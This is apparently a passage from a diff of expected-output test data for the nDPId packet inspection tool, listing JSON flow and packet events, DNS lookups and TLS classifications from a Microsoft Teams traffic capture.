{"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1587041683142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1587041683142,"pkt":"EBMx8Tl2KDc3AG3ICABFAABOVgkAAP8R4j3AqAEGwKgBAeCgADUAOmwyTTEBAAABAAAAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1587041683184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1587041683184,"pkt":"KDc3AG3IEBMx8Tl2CABFAADQTcNAADkRcALAqAEBwKgBBgA14KAAvAAATTGBgAABAAMAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAHADAAFAAEAAAAMACoVdGVhbXMtY2hhdHN2Y2FnZy1wcm9kDnRyYWZmaWNtYW5hZ2VyA25ldADAPgAFAAEAAAEsADAWbXNnLXVrc28tMDEtY2hhdHN2Y2FnZwd1a3NvdXRoCGNsb3VkYXBwBWF6dXJlwCnAdAABAAEAAAAFAAQ0clg7"} 00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} 
